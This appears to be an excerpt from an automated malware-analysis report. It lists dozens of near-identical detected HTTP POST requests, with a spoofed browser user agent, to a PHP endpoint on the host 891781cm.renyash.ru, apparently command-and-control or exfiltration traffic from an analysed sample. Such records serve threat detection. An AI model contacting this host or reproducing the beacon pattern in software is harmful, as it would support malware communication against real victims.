                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1796Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1064Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1784Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1796Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1796Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1064Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1796Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1796Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1064Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1796Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1796Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1796Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
